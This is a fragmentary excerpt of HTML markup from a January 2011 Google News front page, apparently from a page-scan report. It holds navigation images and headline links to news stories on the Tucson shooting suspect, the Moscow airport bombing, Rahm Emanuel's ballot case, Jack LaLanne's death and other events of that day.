...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=n&amp;ict=ln" class="persistentblue"><img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=b&amp;ict=ln" class="persistentblue"><img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=t&amp;ict=ln" class="persistentblue"><img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=e&amp;ict=ln" class="persistentblue"><img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=s&amp;ict=ln" class="persistentblue"><img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=m&amp;ict=ln" class="persistentblue"><img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=ir&amp;ict=ln" class="persistentblue"><img class="chip nav-ir" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<div id="rhc-toggler" class="rhc-toggler"><img id="rhc-toggler-image" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" class="icon rhc-toggler-icon expanded"></div>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.miamiherald.com/2011/01/21/v-fullstory/2028085/they-were-ambushed.html" class="usg-AFQjCNHZQmQghunK_mOXGjo1FQM0Oqf_eQ " title="MiamiHerald.com"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/naj4TdD_2Xxs5M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.miamiherald.com/2011/01/21/v-fullstory/2028085/they-were-ambushed.html" class="usg-AFQjCNHZQmQghunK_mOXGjo1FQM0Oqf_eQ "> MiamiHerald... </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNHqZ10lt7cdruXfdH1xAs6ct4QZGw " href="http://www.miamiherald.com/2011/01/24/2031135/slain-officers-funeral-procession.html?asset_id=Funeral%20procession%20for%20slain%20Miami-Dade%20officers&amp;asset_type=html_module" id="MAA4AEgAUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://pheedo.msnbc.msn.com/click.phdo?i=ece7dfeabc52f4bea351b7e1dc14b312" target="_blank" class="usg-AFQjCNEPSe4_zvoHTNDJhVHgzRITYChnow " id="MAA4AEgAUAFgAmoCdXM">Police fear &#39;war on cops&#39; after 11 shootings</a>
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/SB10001424052748703555804576102430334731152.html?mod=googlenews_wsj" target="_blank" class="usg-AFQjCNFKWTNERTBMgyBF7SF1954uIaH-5Q " id="MAA4AEgAUAJgAmoCdXM">Photos of the Day</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://latino.foxnews.com/latino/politics/2011/01/24/rahm-emanuel-chicago-mayoral-race-opening-latino-candidates/" class="usg-AFQjCNFJBnWLd2TgwaUXTMuZXch-7Gla7g " title="Fox News"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/AB4HnfJM4hcXWM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://latino.foxnews.com/latino/politics/2011/01/24/rahm-emanuel-chicago-mayoral-race-opening-latino-candidates/" class="usg-AFQjCNFJBnWLd2TgwaUXTMuZXch-7Gla7g "> Fox News </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNGJtokXRbLsVUlXcHg5zkA1i0nTdg " href="http://www.suntimes.com/3470538-417/court-emanuel-appellate-chicago-law.html" id="MAA4AEgBUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=A1JzTAhSoKA">Video:&nbsp;
Emanuel Has 'No Doubt' He'll Win Ballot Fight
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.csmonitor.com/USA/2011/0124/Rahm-Emanuel-ruling-big-setback-at-a-crucial-time-in-Chicago-mayor-s-race" target="_blank" class="usg-AFQjCNHviaETBQQ4CbFKFWhs-WtpR5QLaA " id="MAA4AEgBUAFgAmoCdXM">Rahm Emanuel ruling: big setback at a crucial time in Chicago mayor&#39;s race</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEwKQiOZfU8EiZQoS5g2nyEQ2IkLQ " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012404850.html" id="MAA4AEgBUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFJBnWLd2TgwaUXTMuZXch-7Gla7g " href="http://latino.foxnews.com/latino/politics/2011/01/24/rahm-emanuel-chicago-mayoral-race-opening-latino-candidates/" id="MAA4AEgBUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE9k9pvvHS3M9uwGtHG3nIJ00qnUQ " href="http://www.idahostatejournal.com/news/national/article_4f292c44-2808-11e0-86d1-001cc4c03286.html" id="MAA4AEgBUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N64B20110124" class="usg-AFQjCNGKvU8a77RAbuHq71cn0BfubOqx1A " title="Reuters"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/rBoIUSjhqHkkUM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N64B20110124" class="usg-AFQjCNGKvU8a77RAbuHq71cn0BfubOqx1A "> Reuters </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNEfe_UP9nwyItWlPbxKT7Wck8XZfQ " href="http://www.cbsnews.com/8301-503544_162-20029390-503544.html" id="MAA4AEgCUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=pUzMhGLMFgQ">Video:&nbsp;
Obama to Focus on Economy in Tuesday Address
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/idUSN2419720820110124" target="_blank" class="usg-AFQjCNH3n7EELgrOBKKQkV-SndbKEp88kw " id="MAA4AEgCUAFgAmoCdXM">US spending battle looms over Obama speech</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEfyBgEIPRUrTW6Q5mQtZgGGHMGoQ " href="http://www.npr.org/2011/01/24/133188100/new-state-of-the-union-question-found-a-date-yet" id="MAA4AEgCUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHnD8jGZ4-b7iXuMygTSS1YJAV5Iw " href="http://www.bloomberg.com/news/2011-01-22/obama-to-stress-competitiveness-job-creation-deficit-reduction-in-speech.html" id="MAA4AEgCUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHLfCBkbcqp8Q2u9jdOB6Se50Mnsw " href="http://www.oregonlive.com/politics/index.ssf/2011/01/2011_state_of_the_union_-_poli.html" id="MAA4AEgCUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
</div> <img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.cbc.ca/arts/tv/story/2011/01/24/oprah-reunion.html" class="usg-AFQjCNFDR0QmOX6C-l_v50vKksPPaKSEzA " title="CBC.ca"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/qMklKOy43j6_5M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.cbc.ca/arts/tv/story/2011/01/24/oprah-reunion.html" class="usg-AFQjCNFDR0QmOX6C-l_v50vKksPPaKSEzA "> CBC.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEhLfkwP3KHv_AxKWphB2eFXVLo4w " href="http://www.people.com/people/article/0,,20460315,00.html" id="MAA4AEgDUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=1wbQ-zmLKqg">Video:&nbsp;
Oprah Reveals Her Big Family Secret
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.businessinsider.com/wow-how-oprahs-half-sister-discovered-they-were-related-2011-1" target="_blank" class="usg-AFQjCNHu4Y7lCPXQJ2lc2u8sbaHH6Tfs7w " id="MAA4AEgDUAFgAmoCdXM">WATCH: Oprah Meets Her Secret Half-Sister</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFIUkZzAs9Y61wWQ3duZpRqiJx8Gg " href="http://popwatch.ew.com/2011/01/24/oprah-half-sister-family-secret/" id="MAA4AEgDUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF4hVZx0KyfMaR7DUadFRt5fLq5aA " href="http://theweek.com/article/index/211389/oprahs-half-sister-revelation-a-publicity-stunt" id="MAA4AEgDUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE8lkOCVmQaNBIQdhaM5ui-PusAEw " href="http://www.longislandpress.com/2011/01/24/oprahs-sister-oprahs-half-sister/" id="MAA4AEgDUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFXXoTIObmZKgwDKkelX1OPlkq3eQ " href="http://www.thirdage.com/news/vernita-lee-oprahs-mom-couldnt-afford-raise-another-daughter_1-24-2011" id="MAA4AEgDUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.cbc.ca/sports/football/story/2011/01/24/sp-cutler-sprained-mcl.html" class="usg-AFQjCNHO68tPIt-RIKvL2eDyHIRPQpqkXA " title="CBC.ca"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/7106jCsR-SIHYM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.cbc.ca/sports/football/story/2011/01/24/sp-cutler-sprained-mcl.html" class="usg-AFQjCNHO68tPIt-RIKvL2eDyHIRPQpqkXA "> CBC.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNExCKBurSTO2CpunscBMXRB8AS8rg " href="http://sportsillustrated.cnn.com/2011/writers/paul_daugherty/01/24/jay.cutler/" id="MAA4AEgEUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://sports.espn.go.com/chicago/nfl/news/story?id=6054809" target="_blank" class="usg-AFQjCNGOcyfxN0x_yhl1C7G2kN9X2Uvebw " id="MAA4AEgEUAFgAmoCdXM">A closer look at Jay Cutler&#39;s knee injury</a>
...[SNIP]...
<div class="aa-inner"><a href="http://content.usatoday.com/communities/campusrivalry/post/2011/01/dukes-coach-k-says-chicago-bears-qb-jay-cutler-should-support-team/1" target="_blank" class="usg-AFQjCNHjzljR480WHVLDV2GFli4gPC1ywg " id="MAA4AEgEUAJgAmoCdXM">Duke&#39;s Coach K says Chicago Bears QB Jay Cutler should support team</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGk8jkGEv1Mwau1rxJflyTxLLTyLQ " href="http://www.chicagobreakingsports.com/2011/01/bears-cutler-suffers-sprain-of-mcl-in-left-knee.html" id="MAA4AEgEUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGhT_d3vHMRaBJkdkY1C3b7vZZrJg " href="http://profootballtalk.nbcsports.com/2011/01/24/final-cutler-injury-update-grade-ii-mcl-tear/" id="MAA4AEgEUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGamyU16jAdCMJDs5ZkpwKdiXpkGw " href="http://nbcsports.msnbc.com/id/41239129/ns/sports-player_news/" id="MAA4AEgEUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG2WdPyyjmLcRZK_1AY0NI8Eu5RwA " href="http://www.chicagobreakingsports.com/2011/01/bears-teammates-rally-behind-besieged-cutler.html" id="MAA4AEgEUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/news/world/suspect-pleads-not-guilty-in-shooting-of-arizona-politician/article1881169/" class="usg-AFQjCNFHrm3_Wc9W5EPT2lfuU9wPIFUlZg " title="Globe and Mail"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/n7jseiULnXrLMM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/news/world/suspect-pleads-not-guilty-in-shooting-of-arizona-politician/article1881169/" class="usg-AFQjCNFHrm3_Wc9W5EPT2lfuU9wPIFUlZg "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHBvFgzzTzx9w0WGdmzzseti6ngaQ " href="http://www.reuters.com/article/idUSTRE70N6U520110124" id="MAA4AEgFUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://feeds.nytimes.com/click.phdo?i=1134bc987ca2a36b4b35055e16a29639" target="_blank" class="usg-AFQjCNHRBBkahFzpw1JR8NdswhIZNcjYIw " id="MAA4AEgFUAFgAmoCdXM">Suspect Pleads Not Guilty in Tucson Shooting</a>
...[SNIP]...
<div class="aa-inner"><a href="http://abcnews.go.com/US/jared-loughner-accused-tucson-shooter-smiles-court-appearance/story?id=12750000" target="_blank" class="usg-AFQjCNHFSESne1W6NZKJuevUCkqaTiP9mg " id="MAA4AEgFUAJgAmoCdXM">Accused Tucson Gunman Jared Loughner Smiles Through Hearing</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNElebFTmOpQ7wKik8gpIXpP1selVQ " href="http://www.9and10news.com/Category/Story/?id=279641&amp;cID=3" id="MAA4AEgFUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEOK7cyGOy-zN-41xid_LtEjydG4Q " href="http://www.businessweek.com/news/2011-01-24/loughner-pleads-not-guilty-to-attempted-murder-charges.html" id="MAA4AEgFUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEJgwhPmG1bymLrGfBOg1B6uj9lxA " href="http://content.usatoday.com/communities/ondeadline/post/2011/01/tucson-shooting-suspect-loughner-to-be-arraigned-shortly/1" id="MAA4AEgFUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFSXfhjHN0rS0rdJf8PBDheYe6-rQ " href="http://mystateline.com/fulltext-news/?nxd_id=223216" id="MAA4AEgFUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.guardian.co.uk/world/2011/jan/24/domodedovo-airport-bomb-security" class="usg-AFQjCNGVDGLOLsIm_GbjonYy-EjwCNixSQ " title="The Guardian"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/sF9Yx43EuUfcmM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.guardian.co.uk/world/2011/jan/24/domodedovo-airport-bomb-security" class="usg-AFQjCNGVDGLOLsIm_GbjonYy-EjwCNixSQ "> The Guardia... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHSXYfXliztkaNWmpZ7jjwek16gxA " href="http://en.rian.ru/russia/20110125/162282705.html" id="MAA4AEgGUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=90gldve1V1g">Video:&nbsp;
Medvedev delays Davos trip over 'barbaric' Domodedovo tragedy
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/idUS198178545820110124" target="_blank" class="usg-AFQjCNGSAB-m5iwTzxGnMuGS88QYOM7ySw " id="MAA4AEgGUAFgAmoCdXM">Breaking News: At Least 35 Dead, 150 Injured in Moscow Airport Explosion</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHWvc5HbfGnAvgPIeDY6BBRSXxwug " href="http://www.voanews.com/english/news/Blast-Kills-At-Least-10-at-Moscow-Airport-114481529.html" id="MAA4AEgGUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHA0iKAZItKHA9EroIoCjTNS4ph1A " href="http://www.msnbc.msn.com/id/41238598/ns/world_news-europe/" id="MAA4AEgGUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFNSZmNow3mU5fl-5uIhKylIg8xhw " href="http://content.usatoday.com/communities/ondeadline/post/2011/01/bbc-at-least-10-killed-in-explosion-at-moscow-airport/1?csp=hf" id="MAA4AEgGUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG86xUGIkzfiauYZ7t_EAM4mQLkiA " href="http://www.guardian.co.uk/world/2011/jan/24/moscow-airport-bomb-kills-dozens" id="MAA4AEgGUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.foxnews.com/entertainment/2011/01/24/biggest-fitness-guru-time/" class="usg-AFQjCNG2OtWhDeooSC6nGZ0XSwCL8YlTOA " title="Fox News"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/4MailUtGZpNvBM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.foxnews.com/entertainment/2011/01/24/biggest-fitness-guru-time/" class="usg-AFQjCNG2OtWhDeooSC6nGZ0XSwCL8YlTOA "> Fox News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHGP9SsjzyW62sRmc_IObJzTshL0g " href="http://www.mercurynews.com/breaking-news/ci_17184991" id="MAA4AEgHUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=uwXNpYAgahg">Video:&nbsp;
Fitness Guru Jack LaLanne Dead at 96
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.latimes.com/news/obituaries/la-me-jack-lalanne-20110124,0,6764075.story" target="_blank" class="usg-AFQjCNF2h3Ezfm1HF14DqaqR8JY12OIJCg " id="MAA4AEgHUAFgAmoCdXM">Jack LaLanne dies at 96; spiritual father of US fitness movement</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG2OtWhDeooSC6nGZ0XSwCL8YlTOA " href="http://www.foxnews.com/entertainment/2011/01/24/biggest-fitness-guru-time/" id="MAA4AEgHUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHCUvbbz0ZsETsJAmVKDjwuHSZcMQ " href="http://www.usatoday.com/yourlife/fitness/exercise/2011-01-25-lalanneobit24_ST_N.htm?csp=ylf" id="MAA4AEgHUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFY9XEVCdovnm3JUC4ZmzWPDVoZqw " href="http://www.catholic.org/ae/celebrity/story.php?id=40071" id="MAA4AEgHUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEUK_ckNba_6O2oIdCyiO_TLZwXwQ " href="http://www.ksby.com/news/locals-work-out-in-honor-of-the-late-fitness-guru-jack-lalanne" id="MAA4AEgHUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ctv.ca/CTVNews/TopStories/20110122/tunisia-montreal-110122/" class="usg-AFQjCNGCYpC-tROn3xPDxxA2H_u5qL69NQ " title="CTV.ca"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/z55aFPv78aqfWM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/TopStories/20110122/tunisia-montreal-110122/" class="usg-AFQjCNGCYpC-tROn3xPDxxA2H_u5qL69NQ "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGf__nmauUuSabbP9kk2SvRT05zrg " href="http://online.wsj.com/article/SB10001424052748704279704576102300534990160.html?mod=googlenews_wsj" id="MAA4AEgIUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://feeds.nytimes.com/click.phdo?i=7700bb1615b746aacc097462c73508b7" target="_blank" class="usg-AFQjCNHXjZjZZ9wZ1CQDlom-nLlng-eGZQ " id="MAA4AEgIUAFgAmoCdXM">Army Leader Guarantees Stability in Tunisia</a>
...[SNIP]...
<div class="aa-inner"><a href="http://edition.cnn.com/2011/WORLD/americas/01/24/tunisia.canada.ben.ali/" target="_blank" class="usg-AFQjCNHRMMEdervYw4C3TrR4yaH527g-LA " id="MAA4AEgIUAJgAmoCdXM">Family of deposed Tunisian president reportedly flees to Canada</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGfbz26qP-4kIHs7Cs4zetWEFMGQg " href="http://www.reuters.com/article/idUSTRE70N4AE20110124" id="MAA4AEgIUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFd1p9S1P917IJX6_NsO7fub3yJQg " href="http://allafrica.com/stories/201101242014.html" id="MAA4AEgIUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHBQ6i08N55rvq2OZdEmGRrU9lJbg " href="http://www.csmonitor.com/World/Middle-East/2011/0124/Tunisia-s-opposition-defends-unity-government-as-pressure-mounts" id="MAA4AEgIUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEIRtGWiZ24XajWlPE7P_ytLx4u3w " href="http://english.aljazeera.net/news/africa/2011/01/2011124163051778391.html" id="MAA4AEgIUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.zeenews.com/news682964.html" class="usg-AFQjCNGjuhLYOwwQDWERwWa00agiriIpeA " title="Zee News"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/-ZSVDVOrR4x4PM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.zeenews.com/news682964.html" class="usg-AFQjCNGjuhLYOwwQDWERwWa00agiriIpeA "> Zee News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGE1VkAeO99EDIU5V2VTdJDt90ETw " href="http://arstechnica.com/web/news/2011/01/mozilla-google-take-different-approaches-to-user-tracking-opt-out.ars" id="MAA4AEgJUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.pcmag.com/article2/0,2817,2376185,00.asp" target="_blank" class="usg-AFQjCNGZP7c0Zl6lnVgm4bMy_QmQ4_9spA " id="MAA4AEgJUAJgAmoCdXM">Tracking Should Be Abolished</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGMvJiGe2AX0noQzS6SakNvosEsRw " href="http://www.technewsworld.com/story/Firefox-Do-Not-Track-Feature-Seen-as-Toothless-71710.html" id="MAA4AEgJUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH2Ail2CEz7JI11eKLrtWgI-nzRPQ " href="http://www.pcworld.com/businesscenter/article/217478/firefox_donottrack_feature_has_a_fatal_flaw.html" id="MAA4AEgJUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFCTq4wbQgxveQv_898rJ_IkIIXwg " href="http://www.tgdaily.com/software-features/53720-how-to-opt-out-with-googles-chrome-browser" id="MAA4AEgJUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.bizjournals.com/stlouis/news/2011/01/24/creve-coeur-to-lose-smurfit-stone-hq.html" class="usg-AFQjCNFlkgnxLOGOIFyBSsT-ZZz8lmH1PA " title="Bizjournals.com"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/g54p1BDYwrB4oM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.bizjournals.com/stlouis/news/2011/01/24/creve-coeur-to-lose-smurfit-stone-hq.html" class="usg-AFQjCNFlkgnxLOGOIFyBSsT-ZZz8lmH1PA "> Bizjournals... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFJ_Gs52Mso4Rmc8202BGU0W2_L6Q " href="http://www.reuters.com/article/idUSTRE70N6Q420110124" id="MAA4AEgKUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/SB10001424052748703555804576102341574484526.html?mod=googlenews_wsj" target="_blank" class="usg-AFQjCNHfGkJgRqTwQFW4jGNECzdb_053bw " id="MAA4AEgKUAFgAmoCdXM">Smurfit Options Trades Raise Analyst Brows</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.thestreet.com/story/10982553/1/tax-preparation-halliburton-hot-trends.html?cm_ven=GOOGLEN" target="_blank" class="usg-AFQjCNEjjwBXv_sJbLEN9ftV5HG1BzLX7g " id="MAA4AEgKUAJgAmoCdXM">McRib, Smurfit-Stone: Hot Trends</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF7GHQ7EiaH4U94pZ0LQb_hOwaJjA " href="http://www.marketwatch.com/story/rocktenn-to-buy-smurfit-stone-for-35-billion-2011-01-24" id="MAA4AEgKUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF8KU8lwacw5bgjcA_PplD4ky7CcA " href="http://www.missourinet.com/2011/01/24/st-louis-based-smurfit-stone-sells-for-3-5b/" id="MAA4AEgKUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEoA064sb9NXd1pqBHc47dzM2oIJw " href="http://www.thirdage.com/news/rock-tenn-buys-smurfit-stone-35-billion_1-24-2011" id="MAA4AEgKUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5ZW20110124" class="usg-AFQjCNH7STnOQPGVSySyMeBzJftacyPLLg " title="Reuters"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/0fcME5GA0IOcZM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5ZW20110124" class="usg-AFQjCNH7STnOQPGVSySyMeBzJftacyPLLg "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNElKv0GNcBZgzUQCULJE3OQ6oz6jw " href="http://online.wsj.com/article/SB10001424052748704279704576102242255911216.html?mod=googlenews_wsj" id="MAA4AEgLUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=Id_W6wgEIGo">Video:&nbsp;
Palestine Papers spark fury in Ramallah
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
